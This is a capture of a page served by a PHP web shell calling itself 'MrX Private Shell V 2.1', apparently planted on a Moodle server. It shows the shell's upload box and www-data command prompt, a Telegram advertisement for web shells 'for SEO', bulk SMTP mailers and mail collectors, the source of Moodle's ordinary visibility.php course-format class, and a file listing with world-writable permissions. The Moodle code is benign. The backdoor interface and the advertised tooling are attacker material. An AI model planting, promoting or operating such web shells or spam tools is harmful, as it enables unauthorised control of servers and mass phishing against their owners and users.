__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
namespace core_courseformat\output\local\content\section;

use context_course;
use core\output\choicelist;
use core\output\local\dropdown\status;
use core\output\named_templatable;
use core_courseformat\base as course_format;
use core_courseformat\output\local\courseformat_named_templatable;
use core_courseformat\sectiondelegatemodule;
use pix_icon;
use renderable;
use section_info;
use stdClass;

/**
 * Base class to render a section visibility inside a course format.
 *
 * @package   core_courseformat
 * @copyright 2024 Laurent David <laurent.david@moodle.com>
 * @license   http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
class visibility implements named_templatable, renderable {
    use courseformat_named_templatable;

    /** @var course_format the course format */
    protected $format;

    /** @var section_info the section object */
    protected $section;

    /**
     * Constructor.
     * @param course_format $format the course format
     * @param section_info $section the section info
     */
    public function __construct(course_format $format, section_info $section) {
        $this->format = $format;
        $this->section = $section;
    }

    /**
     * Export this data so it can be used as the context for a mustache template.
     *
     * @param \renderer_base $output typically, the renderer that's calling this function
     * @return stdClass|null data context for a mustache template
     */
    public function export_for_template(\renderer_base $output): ?stdClass {
        global $USER;

        if ($this->section->visible) {
            return null;
        }

        $context = context_course::instance($this->section->course);
        $data = new stdClass();

        if (!has_capability('moodle/course:sectionvisibility', $context, $USER)) {
            $data->notavailable = true;
            return $data;
        }

        $data->editing = $this->format->show_editor();

        if ($this->section->is_orphan()) {
            $data->editing = false;
        }

        $data->notavailable = false;
        $data->hiddenfromstudents = true;
        if ($data->editing && $this->is_section_visibility_editable()) {
            $data->dropwdown = $this->get_visibility_dropdown($output);
        } else {
            // The user is editing but cannot edit the visibility on this specific section,
            $data->editing = false;
        }
        return $data;
    }

    /**
     * Check if the section visibility is editable.
     *
     * @return bool
     */
    protected function is_section_visibility_editable(): bool {
        // Delegated section inside a hidden sections are not editable.
        $parentsection = $this->section->get_component_instance()?->get_parent_section();
        if ($parentsection && !$parentsection->visible) {
            return false;
        }
        return true;
    }

    /**
     * Get the section visibility dropdown.
     * @param \renderer_base $output typically, the renderer that's calling this function
     * @return array
     */
    protected function get_visibility_dropdown(\renderer_base $output): array {
        $badgetext = $output->sr_text(get_string('availability'));
        $badgetext .= get_string('hiddenfromstudents');
        $icon = $this->get_icon('hide');

        $choice = new choicelist();
        $choice->add_option(
            'show',
            get_string('availability_show', 'core_courseformat'),
            $this->get_option_data('show', 'sectionShow')
        );
        $choice->add_option(
            'hide',
            get_string('availability_hide', 'core_courseformat'),
            $this->get_option_data('hide', 'sectionHide')
        );
        $choice->set_selected_value('hide');

        $dropdown = new status(
            $output->render($icon) . ' ' . $badgetext,
            $choice,
            ['dialogwidth' => status::WIDTH['big']],
        );
        return $dropdown->export_for_template($output);
    }

    /**
     * Get the data for the option.
     *
     * @param string $name the name of the option
     * @param string $action the state action of the option
     * @return array
     */
    private function get_option_data(string $name, string $action): array {
        $baseurl = course_get_url($this->section->course, $this->section);
        $baseurl->param('sesskey', sesskey());
        $baseurl->param($action,  $this->section->section);

        return [
            'description' => get_string("availability_{$name}_help", 'core_courseformat'),
            'icon' => $this->get_icon($name),
            // Non-ajax behat is not smart enough to discrimante hidden links
            // so we need to keep providing the non-ajax links.
            'url' => $baseurl,
            'extras' => [
                'data-id' => $this->section->id,
                'data-action' => $action,
            ],
        ];
    }

    /**
     * Get the icon for the section visibility.
     * @param string $selected the visibility selected value
     * @return pix_icon
     */
    protected function get_icon(string $selected): pix_icon {
        if ($selected === 'hide') {
            return new pix_icon('t/show', '');
        } else {
            return new pix_icon('t/hide', '');
        }
    }
}

Filemanager

Name Type Size Permission Actions
availability.php File 10.62 KB 0777
cmitem.php File 3.92 KB 0777
cmlist.php File 4.72 KB 0777
cmsummary.php File 4.52 KB 0777
controlmenu.php File 12.62 KB 0777
header.php File 4.34 KB 0777
summary.php File 3.06 KB 0777
visibility.php File 5.83 KB 0777
Filemanager